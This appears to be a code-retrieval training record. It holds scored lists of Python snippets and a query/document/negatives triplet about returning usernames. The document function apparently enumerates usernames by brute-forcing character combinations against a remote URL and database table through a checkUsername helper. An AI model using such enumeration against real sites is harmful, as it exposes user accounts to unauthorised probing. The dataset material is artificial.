prefix = seq[:j]\n # incremented - the value at j-th place that was incremented\n incremented = seq[j] + 1\n # suffix_length - how many nonzero numbers should we put at the end\n # of new sequence to make it restricted-growing\n # and to have all numbers 0..(k-1) in it.\n suffix_length = k - max(b[j], incremented)\n zeroes = [0] * (n - j - suffix_length - 1)\n suffix = list(range(k - suffix_length + 1, k + 1))\n # Construct new sequence\n result = prefix + [incremented] + zeroes + suffix\n return result", "def k_skip_n_grams(arr, n, k):\n if n == 0:\n return\n\n if n == 1:\n for e in arr:\n yield e\n return\n\n for i in range(0, min(len(arr) - n, k) + 1):\n yield from _get_exact_k_skip_n_grams(arr, n, i)", "def perms(n, k):\n if n < k:\n return 0\n return partition(n, [n - k])", "def is_possible(strs, k):\n for i in xrange(len(strs) / k):\n rows = strs[i * k: (i + 1) * k]\n for j in xrange(len(strs[0]) / k):\n piece = [row[j * k: (j + 1) * k] for row in rows]\n target = piece[0]\n for s in piece:\n if s != target:\n return \"Impossible\"\n return \"Possible\"", "def collatz_sequence_term(seed, k):\n if k == 1:\n return seed\n a = seed\n for i in range(k - 1):\n a = collatz(a)\n if a == 1:\n return None if k > i + 2 else a\n return a", "def combinations(n, k):\n return factorial(n) / (factorial(k) * factorial(n - k))", "def generate_candidates(L_k, k):\n candidates = []\n\n # Iterate over every possible pair of transactions and \n # append their union to candidates if the union is \n # one element larger than an itemset in L_k \n # (emulate self joining L_k)\n candidates = set()\n for item in itertools.combinations(L_k, 2):\n union_ = frozenset(item[0].union(item[1]))\n if len(union_) == k+1:\n candidates.add(union_)\n \n # Convert candidates into a list with each candidate converted to custom set\n candidates = [CandidateItem(candidate) for candidate in candidates]\n\n # Prune\n candidates_to_remove = []\n for candidate in candidates:\n # if there's any itemset of size k in each candidate that is not in L_k, add it to the\n # list of candidates to be removed\n if any([c for c in itertools.combinations(candidate, k) if not any([L for L in L_k if len(set(c) & set(L)) == k])]):\n candidates_to_remove.append(candidate)\n \n for i in candidates_to_remove:\n candidates.remove(i)\n \n return candidates", "def n_choose_kv(newK):\n values = np.zeros((1,newK+1))\n ks = np.arange(newK+1)\n \n for i in range(newK+1):\n values[i] = scipy.misc.comb(newK, ks[i])\n\n return values", "def rotate(self, nums, k):\n lenth = len(nums)\n nums[:] = nums[lenth-k:]+nums[:lenth-k]\n return nums", "def MCS(n,k):\n\tglobal dict_all\n\tdict_val=copy.deepcopy(dict_all)\n\t#start_time = time.time()\n\tfinal = {}\t\t\t\t\t # Store all result with the count as key. For example final[1]=[[1,0,0],[0,1,1]]\n\tseq = []\t\t\t\t\t\t# Store the count with no duplication\n\tfor i in range(n):\n\t\tleaf={}\t\t\t\t\t\t# leaf is the dictionary to store the random value of each leaf\n\t\t#count=0\n\t\tfor i in leaves:\n\t\t\tleaf[i] = choice([0,1])\n\t\t\tdict_val[i]=leaf[i]\n\t\t\t#count += leaf[i]\n\t\tresult = Cal_FT(dict_val)\t\n\t\t'''\n\t\tif result:\n\t\t\tcutset = []\n\t\t\tfor i in leaves:\n\t\t\t\tcutset.append(str(leaf[i]))\n\t\t\tcutset=\"\".join(cutset)\n\t\t\tif cutset not in final:\n\t\t\t\tfinal[cutset]=count\n\tfinal_sorted=sorted(zip(final.values(),final.keys())) \t\t\t\t#Order the cutset by its count\n\tfor i in range(k):\t\t\t\t\t\t\t\t\t\t\t\t\t#Print the first k result\n\t\tcutset=list(final_sorted[i][1])\n\t\tresult=[]\n\t\tfor index in range(len(cutset)):\n\t\t\tif cutset[index] is \"1\":\n\t\t\t\tresult.append(leaves[index])\n\t\tprint result\n\t#end_time=time.time()\n\t#print \"Running time is\", end_time-start_time\n\t'''", "def generate_combinations(k: int, n: int):\n result = list()\n for i in range(1, k + 1):\n for bits in itertools.combinations(range(n), i):\n s = [0] * n\n for bit in bits:\n s[bit] = 1\n result.append(s)\n\n return pd.DataFrame(result)", "def sample_without_replacement(k, xsc):\n xs = list(xsc)\n ans = []\n\n while (k > 0) and (xsc != []):\n i = randint(0, len(xsc) - 1)\n ans.append(xsc.pop(i))\n k -= 1\n\n return ans", "def distinct_substrigns(str1, k):\n hash_map = {}\n n = len(str1)\n start = 0 \n end = 1\n hash_map[str1[start]] = 1\n res = [] \n\n while end < n:\n print (\"hash_map is :\", hash_map)\n if str1[end] not in hash_map: \n hash_map[str1[end]] = 1\n else:\n while str1[start]!=str1[end]:\n del hash_map[str1[start]]\n start += 1\n start += 1\n\n if end-start+1 == k:\n temp = str1[start:end+1]\n if temp not in res:\n res.append(temp)\n del hash_map[str1[start]]\n start += 1\n end += 1\n #print(end,start)\n return res", "def rotate(self, nums: List[int], k: int) -> None:\n n = len(nums)\n k %= n\n if k == 0:return \n start = 0\n tmp = nums[start]\n cnt = 0\n while cnt < n:\n nxt = (start + k) % n\n while nxt != start:\n nums[nxt], tmp = tmp, nums[nxt]\n nxt = (nxt+k) % n\n cnt += 1\n nums[nxt] = tmp\n start += 1\n tmp = nums[start]\n cnt += 1", "def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def clumps_finding(text, k, t, L):\n frequent_patterns = []\n clumps = [0 for i in range(0, 4**k)]\n for i in range(0, len(text) - L + 1):\n subtext = text[i:i + L]\n freq_array = compute_freq(subtext, k)\n for index, freq in enumerate(freq_array):\n if freq >= t:\n clumps[index] = 1\n for index, clump in enumerate(clumps):\n if clump == 1:\n pattern = number_to_pattern(index, k)\n frequent_patterns.append(pattern)\n return frequent_patterns", "def rotate1(nums, k):\n n = len(nums)\n\n if k == 0:\n return nums\n if n < 2:\n return nums\n\n k = k % n # In case k > len(nums), prevent redundant rotations\n\n new_nums = [0] * n\n\n for i in range(n):\n j = (i + k) % n # Use modulo for wrap-around\n new_nums[j] = nums[i]\n\n return new_nums", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def number_to_kmer(n, k):\n assert k >= 1\n _, number_to_nucleotide = nucleotide_numbering()\n if k == 1:\n return number_to_nucleotide[n]\n prefix_number = n // 4\n r = n % 4\n nucleotide = number_to_nucleotide[r]\n prefix_dna = number_to_kmer(prefix_number, k - 1)\n res = prefix_dna + nucleotide\n return res", "def better_clumps_finding(text, k, t, L):\n frequent_patterns = []\n clumps = [0 for i in range(0, 4**k)]\n first_subtext = text[:L]\n freq_array = compute_freq(first_subtext, k)\n for index, freq in enumerate(freq_array):\n if freq >= t:\n clumps[index] = 1\n for i in range(1, len(text) - L + 1):\n old_kmer = text[i - 1:i - 1 + k]\n old_kmer_number = pattern_to_number(old_kmer)\n freq_array[old_kmer_number] -= 1\n new_kmer = text[i + L:i + L + k]\n new_kmer_number = pattern_to_number(new_kmer)\n freq_array[new_kmer_number] += 1\n if freq_array[new_kmer_number] >= t:\n clumps[new_kmer_number] = 1\n for index, clump in enumerate(clumps):\n if clump == 1:\n pattern = number_to_pattern(index, k)\n frequent_patterns.append(pattern) \n return frequent_patterns", "def partition(n, k=None, zeros=False):\n if not zeros or k is None:\n for i in ordered_partitions(n, k):\n yield tuple(i)\n else:\n for m in range(1, k + 1):\n for i in ordered_partitions(n, m):\n i = tuple(i)\n yield (0,)*(k - len(i)) + i", "def rotate(nums, k) -> None:\r\n\r\n for i in range(len(nums)-k):\r\n tmp = nums.pop(0)\r\n nums.append(tmp)\r\n\r\n\r\n print(nums)", "def fn(arr, k):\n ans = []\n for i, x in enumerate(arr): \n while ans and ans[-1] < x and len(ans) + len(arr) - i > k: ans.pop()\n if len(ans) < k: ans.append(x)\n return ans", "def kmodels(wordlen: int, k: int, input=None, output=None):\n\n assert 0 <= k < 2**wordlen\n if output is None:\n output = _fresh()\n\n if input is None:\n input = _fresh()\n\n imap, omap = BundleMap({input: wordlen}), BundleMap({output: 1})\n atoms = map(aiger.atom, imap[input])\n\n active = False\n expr = aiger.atom(False)\n for atom, bit in zip(atoms, encode_int(wordlen, k, signed=False)):\n active |= bit\n if not active: # Skip until first 1.\n continue\n expr = (expr | atom) if bit else (expr & atom)\n\n aig = expr.aig['o', {expr.output: omap[output][0]}]\n aig |= aiger.sink(imap[input])\n return aigbv.AIGBV(imap=imap, omap=omap, aig=aig)", "def chunkedClumpFinder(sequence, k, L, t):\n\n frequentPatterns = set([])\n for i in range(len(sequence)):\n window = sequence[i:i + L]\n frequencies = {}\n\n for j in range(len(window)):\n pattern = window[j:j + k]\n if pattern not in frequencies:\n frequencies[pattern] = 1\n else:\n frequencies[pattern] += 1\n for p in frequencies:\n if frequencies[p] >= t:\n frequentPatterns.add(p)\n return frequentPatterns", "def clump_forming_kmers(string, k, l, t):\n clumpFormingKmers = set()\n # Initial counts of k-mers within length l window starting from the first\n # chracter of the string.\n counts = Counter([kmer for i, kmer in enumerate_kmers(string[:l], k)])\n clumpFormingKmers = add_clump_forming_kmers(counts, clumpFormingKmers)\n\n for i in range(1, len(string) - l + 1):\n counts[string[i-1:i-1+k]] -= 1\n counts[string[i+l-k:i+l]] += 1\n clumpFormingKmers = add_clump_forming_kmers(counts, clumpFormingKmers)\n\n return list(clumpFormingKmers)", "def combinations(n, k):\r\n return exp(gammaln(n + 1) - gammaln(k + 1) - gammaln(n - k + 1))", "def length_of_longest_substring(arr, k):\n window_start = 0\n max_repeat_times = 0\n frequency_map = {0: 0, 1: 0}\n len_longest = 0\n\n for window_end in range(len(arr)):\n right_char = arr[window_end]\n left_char = arr[window_start]\n frequency_map[right_char] += 1\n max_repeat_times = frequency_map[0]\n\n if max_repeat_times > k:\n frequency_map[left_char] -= 1\n window_start += 1\n len_longest = max(len_longest, window_end - window_start + 1)\n\n return len_longest", "def chunks(cipher, size):\n\treturn [cipher[i*size:(i+1)*size] for i in range(int(math.ceil(len(cipher)*1.0/size)))]", "def part_recur(ckt, initial, w):\n partition_set = []\n# partition_mech = KLPart.KLPartition()\n# convert_Gate(ckt, partition_mech)\n print \"Diving into C++\"\n# (a, b) = partition_mech.partition_once(KLPart.StringVector(list(set(initial))))\n (a, b) = partition(ckt, list(set(initial)))\n print \"Coming back up\"\n if len(get_inputs(ckt, a)) > w and len(a) > 3:\n partition_set = partition_set + part_recur(ckt, a, w)\n else:\n partition_set.append(a)\n if len(get_inputs(ckt, b)) > w and len(b) > 3:\n partition_set = partition_set + part_recur(ckt, b, w)\n else:\n partition_set.append(b)\n return partition_set", "def combinarink(list, k):\n global visited\n global indexes\n visited = [0 for x in range(0, len(list) + 1)] # init with 0\n indexes = [x for x in range(0, len(list) + 1)] # init indexes with 0...n-1\n output = combinari(1, len(list), k, list, [])\n print (output)" ]
[ "0.6393046", "0.63518596", "0.6346528", "0.63429147", "0.62951434", "0.62502956", "0.62439233", "0.61887056", "0.6169127", "0.6153225", "0.61380696", "0.6062542", "0.6060054", "0.6024283", "0.6011528", "0.6003349", "0.59933025", "0.5982021", "0.5982021", "0.59802747", "0.59543186", "0.5937869", "0.5930514", "0.59005123", "0.5885605", "0.58799535", "0.58694834", "0.5865896", "0.58610773", "0.58521634", "0.58449274", "0.58398014", "0.58184046", "0.58039916", "0.577591", "0.57745343", "0.57710034", "0.5770836", "0.5764095", "0.57549673", "0.57414573", "0.5737963", "0.57226783", "0.57216275", "0.571604", "0.56951237", "0.56906766", "0.5685328", "0.5683789", "0.56820077", "0.5668515", "0.5648699", "0.56456566", "0.5638915", "0.5621852", "0.56148845", "0.5609998", "0.56053877", "0.56047124", "0.5598647", "0.55769974", "0.557267", "0.5572357", "0.5571756", "0.55685955", "0.55558515", "0.55555475", "0.554838", "0.5544726", "0.553872", "0.5534585", "0.5516193", "0.5502239", "0.55015963", "0.5487095", "0.548323", "0.5482142", "0.54733986", "0.5470544", "0.5461158", "0.545335", "0.54532284", "0.54490167", "0.5445134", "0.54402304", "0.54292524", "0.5422276", "0.5412574", "0.5411632", "0.5411186", "0.5390162", "0.5389234", "0.5388295", "0.5374496", "0.536874", "0.53655356", "0.53628176", "0.53619087", "0.5357846", "0.5356749" ]
0.85543895
0
returns a list of usernames
def userNames(lst, url, tableName): n = len(lst) # https://docs.python.org/3/library/itertools.html#itertools.product # https://stackoverflow.com/questions/3034014/how-to-apply-itertools-product-to-elements-of-a-list-of-lists lst2 = list(itertools.product(*lst)) lst3 = list(map("".join, lst2)) # # Maybe use checkUsernameSequences here, # then add a check to reduce the amount of possibilities before building lst? # seq = checkUsernameSequences(n, lst, url, tableName, minLen = 2, maxLen = 2) # does not include the single characters since minLen > 1 lst4 = filt(seq, lst3) """# next time: find matching strings. That should (hopefully) reduce the space to search. REMEMBER, this filtering will miss all single character usernames!!! https://docs.python.org/3/library/re.html#regular-expression-syntax https://stackoverflow.com/questions/3640359/regular-expressions-search-in-list https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string https://stackoverflow.com/questions/19300020/python-match-a-string-with-regex https://stackoverflow.com/questions/37974047/if-any-strings-in-a-list-match-regex """ lst5 = [x for x in lst4 if checkUsername(x, url, tableName)] # lst = list(map(checkUsername, lst2)) return lst5
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def user_list(self):\n self.cur.execute(\"SELECT username FROM users\")\n users = []\n for username in self.cur.fetchall():\n users.append(username[0])\n return users", "def fetch_usernames(self, users):\n user_list = []\n for user in users:\n user_list.append(user.username)\n return user_list", "def user_names(self):\n results = []\n for user_detail in self.users:\n results.append(user_detail.user_name)\n results.sort()\n return results", "def all_users():\n\treturn [unicode(name[:-4]).lower() for name in os.listdir(os.path.join(WORLD_DIR, 'players'))]", "def user_names(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"user_names\")", "def example_usernames():\n return [\"A\", \"B\", \"C\"]", "def check_user_name(self, username):\n usernames = []\n for user in self.__users:\n if user['username'] == username:\n usernames.append(user)\n return usernames", "def get_blocked_usernames_list():\n return []", "def listusers():\n allusers = []\n with open('/etc/passwd', 'r') as pw:\n for l in pw.readlines():\n allusers.append(l.split(':')[0])\n users = [ d for d in os.listdir(\"/home\") if d in allusers ]\n return(users)", "def GetUserNamesList():\n\n # Create a list\n time.sleep(5)\n usernameslist = []\n\n html = Global.driver.page_source\n\n page = soup(html, \"lxml\")\n\n # Get all usernames\n table = page.find('div', class_=\"user-management-table-view\")\n\n tablebody = table.find('tbody')\n\n elements = tablebody.find_all('tr')\n\n for tr_tag in elements:\n usernameelement = tr_tag.find('span')\n\n username = usernameelement.text.strip('\\n')\n\n usernameslist.append(username)\n\n return usernameslist", "def list_users(item):\n users = User.load_all_users(item)\n for user in users:\n print(user.username)", "def users(self) -> List[str]:\n return self._users", "def get_usernames(self, selector: Optional[Callable[[User], bool]]=None) -> Set[str]:\n return set([u.name for u in self.iter_users(selector)])", "def users():\n retlist = []\n rawlist = cext.users()\n for item in rawlist:\n user, hostname, tstamp = item\n user = py2_strencode(user)\n nt = _common.suser(user, None, hostname, tstamp, None)\n retlist.append(nt)\n return retlist", "def get_all_users():", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def get_RegisteredUsersList(test_case, override_headers=null, override_cookies=null):\n # type: (AnyMagpieTestCaseType, Optional[HeadersType], Optional[CookiesType]) -> List[Str]\n app_or_url = get_app_or_url(test_case)\n resp = test_request(app_or_url, \"GET\", \"/users\",\n headers=override_headers if override_headers is not null else test_case.json_headers,\n cookies=override_cookies if override_cookies is not null else test_case.cookies)\n json_body = check_response_basic_info(resp, 200, expected_method=\"GET\")\n return json_body[\"user_names\"]", "def get_users(self):\n fields = ['name', ]\n return self.get_data(\"myUsers\", fields)", "def list_users():\n\ttry:\n\t\tusers_call = sc.api_call(\"users.list\")\n\t\tusers = []\n\t\tif users_call.get('ok'):\n\t\t\treturn users_call['members']\n\texcept:\n\t\tprint(\"users error\")\n\treturn None", "def users():\n access_token = session['access_token']\n return \"%s\" % list_users(access_token)", "def list_users(self):\n return self.get_admin(\"users\")", "def get_users_name(self, session) -> Tuple[int, str, str]:\n users = (\n session.query(User.chat_id, User.first_name, User.last_name)\n .filter(User.is_admin==False)\n .all()\n )\n return users", "def get_user_list(self):\n self.user_list = db.get_user_list()\n for each in self.user_list:\n print each[1] # username\n while(True):\n selection = raw_input(\"Enter username to use\")\n if selection in self.user_list:\n return selection", "def getUsers(self):\n return [u[0] for u in pwd.getpwall()\n if (u[5].startswith('/home/') and u[6].endswith('sh'))]", "def get_names(user_indexes):\n users = conf[\"users\"]\n names = []\n for i in user_indexes:\n if i < 1:\n names.append(\"{0} Unknown\".format(i))\n else:\n names.append(\"{0} {1}\".format(i, users[i-1]))\n return names", "def list_users(self):\n raise NotImplementedError", "def get_user_list(host):\n users = query(\"$.host.'{host}'.user\", host=host)\n if isinstance(users, (str, unicode)):\n users = users.replace(', ', ' ').replace(',', ' ').split(' ')\n return users or []", "def _get_users_list(self):\n return self.users['user_id'].tolist()", "def do_list_users(self, line):\n users = self.protocol.cmd_list_users(exp=line, return_list=True)\n t = PrettyTable(users[0])\n for u in users[1:]:\n t.add_row(u)\n print(t)", "def _users_list(self):\n result = self.slack.api_call(\"users.list\", presence=0)\n\n if not result.get(\"ok\"):\n logging.error(result['error'])\n return None\n\n return result['members']", "def get_usernames(user_ids: List[int]) -> Union[str, List[str]]:\n with engine.connect() as conn:\n usernames = conn.execute(f\"\"\"\n SELECT username FROM users WHERE id IN ({', '.join(['%s'] * len(user_ids))})\n \"\"\", user_ids).fetchall()\n return [x[0] for x in usernames]", "def user_list(server_object, client, address, command_args):\n\n\tmsg = \"\"\n\n\t#: Create a formatted string of all the users.\n\tfor usr in server_object.usrs.values():\n\t\tmsg += usr + '\\n'\n\n\tclient.send(msg.encode())", "def get_user_list():\n\tudb = UserPageDB()\n\ttry:\n\t\tusers = udb.user_list()\n\t\treturn UserList([_transform_user(u) for u in users])\n\tfinally:\n\t\tudb.close()", "def get_users():\n users = functions.users()\n return users", "def get_user_list():\n users_tuple = db_session.query(Chat.chatID).all()\n users_list = [user for user, in users_tuple]\n return users_list", "def get_users(self):\r\n\t\tlogger.debug(\"Fetch users\")\r\n\t\t\r\n\t\treturn login.get_users()", "def list_user(self, username):\n return self.get_admin(u\"users/{}\".format(username))", "def list_users():\n\n users = User.query.order_by(\"last_name\").all()\n return render_template(\"users/user_list.html\", users=users)", "def users(self):\n return self.get_data(\"users\")", "def display_users(cls):\n return cls.user_list", "def getNames(self) -> List[unicode]:\n ...", "def listUsers(self):\n return self._client.listUsers()", "def __list_all_users(self):\n\n usernames_dict = get_data.get_usernames_dict()\n if len(usernames_dict) > 0:\n first_str = 'user'\n second_str = 'posts scraped'\n descriptor = '{:<40} {}'\n print('')\n print(descriptor.format(first_str, second_str))\n print(descriptor.format(len(first_str) * '-', len(second_str) * '-'))\n for number, username in usernames_dict.items():\n space_str = ' ' if len(str(number)) > 1 else ' '\n first = '[' + space_str + str(number) + '] ' + username\n second = str(get_data.get_user_post_count(username))\n print(descriptor.format(first, second))\n else:\n print('no users found in the database')", "def user_list(ctx):\n data = ctx.obj.get_all_users()\n output_json_data(data)", "def get_users(self):\n users = []\n page = 1\n while not len(users) % 100:\n users += self._get('/users?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not users:\n break\n page += 1\n return users", "def list_users(self, user=None):\n from expfactory.database.models import Participant\n\n participants = Participant.query.all()\n users = []\n for user in participants:\n users.append(self.print_user(user))\n return users", "def get_users():\n return db.fetch_users()", "def keys(self):\n tuples = self._execute(\"SELECT name FROM users\")\n ret = [tup[0] for tup in tuples]\n return ret", "def view_list_users(self, user):\r\n return user.realm._users.keys()", "def _list_users(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows:\")\n for i in users:\n print(users[i][\"name\"])\n self._list_user_settings(users)", "def project_users(): \r\n project_school = api.projects.get_by_slug('ps') \r\n users_list = []\r\n for member in project_school.members:\r\n users_list.append(member.username + '@miem.hse.ru')\r\n \r\n #replaces some users usernames as they are different in taiga than in google groups \r\n for user in range(len(users_list)):\r\n if (users_list[user] == 'DenisPalukha@miem.hse.ru'):\r\n users_list[user] = 'dvpalukha@miem.hse.ru'\r\n if (users_list[user] == 'Affid@miem.hse.ru'):\r\n users_list[user] = 'aafyodorov@miem.hse.ru'\r\n \r\n return users_list", "def get_user_list():\n response = []\n for user in mongo.db.users.find():\n user[\"_id\"] = str(user[\"_id\"])\n response.append(user)\n return response", "def list_users(self):\n _url = \"http://\" + self.host_ip + \":35357/v2.0/users\"\n _body = None\n _headers = {'Content-type': 'application/json',\n 'x-auth-token': self.cloud_admin_info['token_project']}\n\n response = self.request(\"GET\", _url, _headers, _body)\n if response is None:\n LOG_OBJ.error(\" no response from Server\")\n return response\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\n \"get user list Failed with status %s \" %\n response.status)\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"users List : %s\")\n return output[\"users\"]", "def get_users_by_name(query):\n\n user_list = None\n if query == None:\n user_list = User.objects.filter(Q(user_profile__isnull=False))\n else:\n user_list = User.objects.filter(Q(first_name__icontains=query) | Q(last_name__icontains=query)).distinct()\n return user_list", "def get_names(self):\r\n names = []\r\n for p in self.people:\r\n names.append(p.get_name())\r\n return names", "def list_users(self, stream_name:str, version:int=1)->List[str]:\n stream_path = self._get_storage_path(stream_name=stream_name, version=version)\n all_users = self._ls_dir(stream_name=stream_name, version=version)\n user_ids = []\n for usr in all_users:\n user_ids.append(usr.replace(stream_path,\"\").replace(\"user=\",\"\").replace(\"study=\"+self.study_name, \"\"))\n return user_ids", "def get_users(self):\n return self.execute(TABELLE['users']['select']['all'])", "def getAllUsers(self):\r\n return [(ind, user) for ind, user in enumerate(self.users)]", "def get_users(self):\n res = self.conn.cursor().execute('SELECT id,email,username FROM users')\n return res.fetchall()", "def getUsers(self) -> List[bbUser.bbUser]:\n return list(self.users.values())", "def list_user():\n\tbegin = 0\n\tlength = 25\n\ttry:\n\t\tif request.json != None:\n\t\t\tbegin = int(request.json.get('begin', 0))\n\t\t\tlength = int(request.json.get('length', 25))\n\texcept:\n\t\tabort(403)\n\tif length > 100 :\n\t\tlength = 100\n\tuserList = User.list(begin, length)\n\tif userList == None:\n\t\tabort(400)\n\treturn jsonify({'users': map(lambda(e): e.output(), userList), 'begin': begin, 'length': len(userList)})", "def _get_userlist_by_userright(self, userright):\n params = {\n \"action\": \"query\",\n \"list\": \"allusers\",\n \"format\": \"json\",\n \"augroup\": userright,\n \"aulimit\": \"500\",\n }\n r = self.session.get(ENWIKI_API, params=params)\n data = r.json()\n return [u[\"name\"] for u in data[\"query\"][\"allusers\"]]", "def get_user_list(self, connection):\n http = get_web_service(connection)\n try:\n req = http.request('GET', connection[\"url\"] + '/users/?_format=json')\n data = json.loads(req.data.decode('utf-8'))\n # print(json.dumps(data, indent=4, sort_keys=True))\n return data\n except urllib3.exceptions.HTTPError as e:\n print(\"Connection error\")\n print(e)", "def getUsers(self):\n logger.debug(\"Func: getUsers\")\n\n return sorted(self._usersDict.keys())", "def get_users_admins_name(self, session) -> Tuple[int, str, str]:\n users = (\n session.query(User.chat_id, User.first_name, User.last_name)\n .all()\n )\n return users", "def getMembersName(self):\n listMemberName = []\n for member in self.playersAndRoles:\n listMemberName.append(member.user.name)\n random.shuffle(listMemberName)\n return listMemberName", "def list_users():\n users = User.query.order_by(User.last_name, User.first_name).all()\n return render_template('index.html', users=users)", "def fetch_users(self, username_list=None):\n cursor = DB.instance.connection.cursor()\n # create string to fetch multiple usernames specified in username_list\n if len(username_list) is not None and isinstance(username_list, list):\n searches = \"','\".join(username_list)\n query = \" SELECT * FROM users WHERE Username in ('{}')\".format(searches)\n cursor.execute(query)\n else:\n cursor.execute(''' SELECT * FROM users ''')\n\n return cursor.fetchall()", "def user_list(self, mapp, url_of_liveserver):\n return mapp.getjson(url_of_liveserver)['result'].keys()", "def getResponsibleUsers():", "def getUsers(users_file):\n user_names = tuple(open(users_file, 'r'));\n for user_name in user_names:\n clean_user_name = user_name.rstrip(\"\\n\")\n listQuestions(clean_user_name)", "def do_user_list(cs, args):\n _, users = cs.users.list()\n fields = ['user_id', 'username', 'email', 'realname', 'comment']\n utils.print_list(users, fields, sortby=args.sortby)", "def get_users_for(self, server, channame):\n skey = server.lower()\n ckey = irc.strings.lower(channame)\n users = []\n if skey in self.serverchans and ckey in self.serverchans[skey]:\n users = self.serverchans[skey][ckey].users.keys()\n return users", "def get_users(self):\n return self.get_all_dbusers()", "def query(self, *args, **kwargs) -> List[str]:\r\n self.logger.info(\"Returning Manual Users\")\r\n\r\n return kwargs['users']", "def get_users(self) -> List[Dict[str, Any]]:\n users = self.user_manager.get_users()\n return [\n {\n 'user_id': user.user_id,\n 'username': user.username,\n 'created_at': user.created_at.isoformat(),\n }\n for user in users\n ]", "def users_get(): # noqa: E501\n base.check_session()\n ret = []\n for u in users.values():\n ret.append(_cleanuser(u))\n return ret", "def _load_users(self) -> List[Dict]:\n try:\n api_call = self.web_client.api_call('users.list')\n if api_call.get('ok'):\n return api_call.get('members')\n except Exception:\n LOGGER.exception('Cannot get users')\n raise", "def get_members(self):\r\n database = main.connect_to_cloudsql()\r\n cursor = database.cursor()\r\n query = (\"SELECT username from \" + ENV_DB + \".Groups WHERE gid='{}'\").format(self.g_id)\r\n cursor.execute(query)\r\n data = cursor.fetchall()\r\n database.close()\r\n return list(i[0] for i in data)", "def lookup_users(self):\n return self.slack_users", "def names(self) -> list[str]:", "def reponames(gh, user):\n return [u.split('/')[-1] for u in urls(gh, user)]", "async def list_users(self) -> List[int]:\n return [\n # row[0]\n # async for row in self.conn.execute(\n # \"select userid from tg_users\",\n # )\n ]", "def list( self, mess, args):\n user = self.get_sender_username(mess)\n args = args.replace(' ', '_')\n if user in self.users:\n user_list = 'All these users are subscribed - \\n'\n user_list += '\\n'.join(['%s :: %s' %(u, self.users[u]) for u in sorted(self.users)])\n if self.invited.keys():\n user_list += '\\n The following users are invited - \\n'\n user_list += '\\n'.join(self.invited.keys())\n self.log.info( '%s checks list of users.' % user)\n return user_list", "def users_view():\n users = get_users()\n data = get_data()\n result = [{'user_id': i, 'name': users[i]}\n for i in users.keys() if int(i) in data.keys()]\n #import pdb; pdb.set_trace()\n result.sort(key=lambda item: item['name'], cmp=locale.strcoll)\n return result", "def get_users():\n users = User.query.order_by(User.id).all()\n users = {user.id: user.username for user in users}\n\n response = jsonify({\"success\": True, \"users\": users})\n\n return response", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def users(message):\n user_list = []\n for userid, user in iteritems(message._client.users):\n user_list.append(user[\"name\"])\n message.reply(Strings['USERS_FOUND'].format(len(user_list)))", "def list_users():\n check_admin()\n results = User.query.order_by(-User.id)\n return render_template('user_list.html', users=results)", "def get_users():\n\n return User.query.all() # [<User user_id=1 fname=Alice lname=Apple>]", "def getMyUsers(self):\n my_users = None\n if self.current_user.is_superuser or self.current_user.has_perm(\"manage_input_templates\"):\n my_users = UserCompany.objects.filter(\n company__pk=self.client_session.companyId).all()\n else:\n my_users = UserCompany.objects.filter(pk=self.client_session.userCompanyId).all()\n\n ids = []\n if my_users.count() > 0:\n ids = [str(d.id) for d in my_users]\n return \",\".join(ids)", "def users_get(self) -> Dict[str, list]:\n self.__logger.debug('Eva.users_get called')\n return self.__http_client.users_get()", "def get_users():\n return Response(f\"{User.get_all_users()}\", 200, mimetype='text/plain')", "def listUsers(self):\n return tuple(User.create({'name':name},self._modelDataManager) for name in self.pm_getUserManager().listUsers())", "def list_users_in_pool():\n files = []\n USERS_DIR = os.path.join(UPLOAD_DIRECTORY, \"users\")\n for filename in os.listdir(USERS_DIR):\n path = os.path.join(USERS_DIR, filename)\n if os.path.isdir(path):\n files.append(filename)\n return jsonify(files)", "def build_users_list():\n\n # Cannot query in cronjob (only use case for this func) without app running.\n # Must build separate connection to read file\n # con = sqlite3.connect(f\"{cur_wd}/bigbeta/site.db\")\n # cur = con.cursor()\n # users_list = [u for u in cur.execute(\"SELECT email FROM user;\")]\n\n # Get app context\n\n with bigbeta_app.app_context():\n users = User.query.all()\n user_emails = [user.email for user in users]\n\n return user_emails", "def users(self, site = None):\r\n uids = self.user_ids()\r\n if uids:\r\n users = Account._byID(uids, True, return_dict = False)\r\n return [self.ajax_user(u) for u in users]\r\n else:\r\n return ()", "def get_users_list_full(self, session):\n\n users = session.query(\n User.chat_id,\n User.is_banned,\n User.username,\n User.first_name,\n User.last_name,\n User.time_registered\n ).filter(User.is_admin==False).all()\n return users", "def get_all_names(self):\r\n return [person.name for person in self.__person_repository.elements]" ]
